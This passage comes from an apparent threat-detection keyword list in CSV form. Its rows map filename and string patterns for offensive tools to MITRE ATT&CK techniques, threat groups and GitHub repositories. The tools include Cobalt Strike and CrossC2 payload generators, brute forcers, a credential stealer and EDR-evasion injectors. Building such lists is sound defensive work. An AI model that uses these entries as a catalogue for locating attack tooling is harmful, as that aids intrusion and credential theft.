cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*crossc2_entry*",".{0,1000}crossc2_entry.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*crossc2_portscan.*",".{0,1000}crossc2_portscan\..{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*crossc2_serverscan.*",".{0,1000}crossc2_serverscan\..{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*CrossC2Beacon*",".{0,1000}CrossC2Beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2-cs*",".{0,1000}CrossC2\-cs.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2-GithubBot*",".{0,1000}CrossC2\-GithubBot.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2Kit",".{0,1000}CrossC2Kit","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2Kit.*",".{0,1000}CrossC2Kit\..{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*CrossC2Kit.*",".{0,1000}CrossC2Kit\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. 
CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*CrossC2Kit.git*",".{0,1000}CrossC2Kit\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*CrossC2Kit_demo*",".{0,1000}CrossC2Kit_demo.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*crossc2kit_latest*",".{0,1000}crossc2kit_latest.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2Kit_Loader*",".{0,1000}CrossC2Kit_Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*CrossC2Listener*",".{0,1000}CrossC2Listener.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2MemScriptEng*",".{0,1000}CrossC2MemScriptEng.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*CrossC2Script*",".{0,1000}CrossC2Script.{0,1000}","offensive_tool_keyword","cobaltstrike","generate 
CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossLinked*",".{0,1000}CrossLinked.{0,1000}","offensive_tool_keyword","CrossLinked","CrossLinked simplifies the processes of searching LinkedIn to collect valid employee names when performing password spraying or other security testing against an organization. 
Using similar search engine scraping capabilities found in tools like subscraper and pymeta","T1596 - T1593 - T1591 - T1589 - T1556 - T1213","TA0043 - TA0010 - TA0009","N/A","N/A","Information Gathering","https://github.com/m8r0wn/CrossLinked","1","0","N/A","N/A","10","1149","173","2024-04-17T18:32:59Z","2019-05-16T13:36:36Z" "*CrossNet.exe*",".{0,1000}CrossNet\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","360","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*Cross-Site-Scripting-XSS-Payloads*",".{0,1000}Cross\-Site\-Scripting\-XSS\-Payloads.{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - 
TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*CrossTenantSynchronizationBackdoor.ps1*",".{0,1000}CrossTenantSynchronizationBackdoor\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*crowbar*",".{0,1000}crowbar.{0,1000}","offensive_tool_keyword","Crowbar","Crowbar (formerly known as Levye) is a brute forcing tool that can be used during penetration tests. It was developed to brute force some protocols in a different manner according to other popular brute forcing tools. As an example. while most brute forcing tools use username and password for SSH brute force. Crowbar uses SSH key(s). This allows for any private keys that have been obtained during penetration tests. 
to be used to attack other SSH servers.","T1110 - T1114 - T1189 - T1051 - T1552","TA0002 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/galkan/crowbar","1","0","N/A","N/A","10","1306","318","2023-12-19T20:57:36Z","2014-09-30T07:46:23Z" "*CroweCybersecurity/ad-ldap-enum*",".{0,1000}CroweCybersecurity\/ad\-ldap\-enum.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","AD Enumeration","6","4","301","67","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" "*crpasswords.txt*",".{0,1000}crpasswords\.txt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*CRTInjectAsSystem*",".{0,1000}CRTInjectAsSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*CRTInjectElevated*",".{0,1000}CRTInjectElevated.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*CRTInjectWithoutPid*",".{0,1000}CRTInjectWithoutPid.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*crunch * -o 